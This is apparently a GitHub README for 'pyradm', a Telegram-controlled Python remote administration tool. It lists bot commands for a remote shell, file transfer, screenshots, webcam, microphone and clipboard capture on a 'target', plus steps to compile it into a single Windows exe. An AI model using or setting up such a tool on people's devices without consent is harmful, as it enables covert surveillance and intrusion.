akhomlyuk / pyradm

๐Ÿ”ฎ Python Remote administration tool via telegram

Home Page:https://t.me/pt_soft

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

๐Ÿ”ฎ pyradm

Remote administration crossplatfrom tool via telegram
Coded with โค๏ธ python3 + aiogram3
https://t.me/pt_soft

๐Ÿ’ป v0.3

  • Screenshot from target
  • Crossplatform
  • Upload/Download
  • Fully compatible shell
  • Process list
  • Webcam (video record or screenshot)
  • Geolocation
  • Filemanager
  • Microphone
  • Clipboard (text, image)

โš™๏ธ Functional

/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
Press button to download file
Send any file as file for upload to target

๐Ÿ“˜ Install

  • git clone https://github.com/akhomlyuk/pyradm.git
  • cd pyradm
  • pip3 install -r requirements.txt
  • Put bot token to cfg.py, ask @Bothfather
  • python3 main.py

๐Ÿšฅ Compile

  • Put bot token to cfg.py
  • pip install nuitka
  • nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py

๐Ÿ“ท Screens

pyadm.png mobile.png shell.png webcam.png map.png fileman.png

HitCount

About

๐Ÿ”ฎ Python Remote administration tool via telegram

https://t.me/pt_soft

License:Apache License 2.0


Languages

Language:Python 100.0%